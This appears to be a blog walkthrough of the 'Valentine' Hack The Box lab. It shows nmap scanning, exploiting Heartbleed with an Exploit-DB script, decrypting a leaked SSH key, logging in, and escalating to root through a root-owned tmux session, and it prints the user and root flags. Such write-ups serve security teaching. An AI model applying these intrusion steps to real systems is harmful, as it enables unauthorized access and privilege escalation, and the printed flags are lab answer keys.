top of page
Search

Valentine

  • Admin
  • Jan 7, 2022
  • 2 min read

Updated: Jul 10, 2023


Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.10.10.79
ree

Port 80 is open so let's check via our browser:

ree

Heart and blood...


Port 443 is open so let's check in our browser:

ree

Let's do a scan of port 443 using:

nmap -sV -sC -p 443 --script vuln 10.10.10.79
ree

ree

This mentions the Heartbleed vulnerability. The blood and the hearts from earlier makes sense now!


From your VM, open a new command prompt window and type:

searchsploit heartbleed
ree
Searchsploit is the command line search tool for Exploit-db

Let's use the first exploit on the list:

searchsploit -m exploits/multiple/remote/32764.py
ree

This will copy the exploit straight into your current directory


ls
ree

Let's run the exploit using:

python2 32764.py 10.10.10.79
ree

If you scroll through, on the right side, you can see the following string:

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

This is base 64. We can decode it using:

echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 --decode
ree

heartbleedbelievethehype


Let's keep that for later.


Let's now use gobuster to find any hidden directories:

gobuster dir -u http://10.10.10.79 -w /opt/useful/SecLists/Discovery/Web-Content/big.txt
ree

We find 10.10.10.79/dev

Let's check it out:

ree

Click on hype_key

ree

Let's convert the above hex to ascii . Open a new command prompt and type:

cd Downloads
ls
wget http://10.10.10.79/dev/hype_key

To download the key to my VM

ls

The file is now here, it is called hype_key

cat hype_key | xxd -r -p
ree

This command converts it to ascii directly


The key is as per below. But it is encrypted!

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

Let's save the key under a new file called "hype_key_encrypted" using:

cat hype_key | xxd -r -p > hype_key_encrypted
ls

Let's now use openssl to try to decrypt using:

openssl rsa -in hype_key_encrypted -out hype_key_decrypted
ree

It is asking for a passphrase. Let's try what we just found earlier:

heartbleedbelievethehype


ree

It worked!


ls
ree

Now we have a new file called hype_key_decrypted


Let's now try to ssh. Let's guess the username as hype:

ssh -i hype_key_decrypted hype@10.10.10.79
ree

It works! we are in


whoami
ree

cd Desktop
ree

ls
cat user.txt
ree

Congratulations! You got the user flag!


e6710a5464769fd5fcd216e076961750


Let's now check the root folder:


cd ..
ls
cd ..
ls
cd ..
ls
ree

cd root
ree

Our access is denied. So we need to escalate privileges.



Privilege Escalation


Go back to home directory

cd ~
ls -al
ree

We find .bash_history


cat .bash_history
ree

ps aux | grep tmux
ree

Let's google tmux and find out more about this process. After some research, we find that we could use the following:

tmux -S /.devs/dev_sess

A new prompt window appears

ree

whoami
ree

We are root!


ls
cd ~
ls
cat root.txt
ree

f1bb6d759df1f272914ebbc9ed7765b2


Congratulations! You got the root flag!



 
 
 

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet
Add a rating

©2025 by My Tech On IT

bottom of page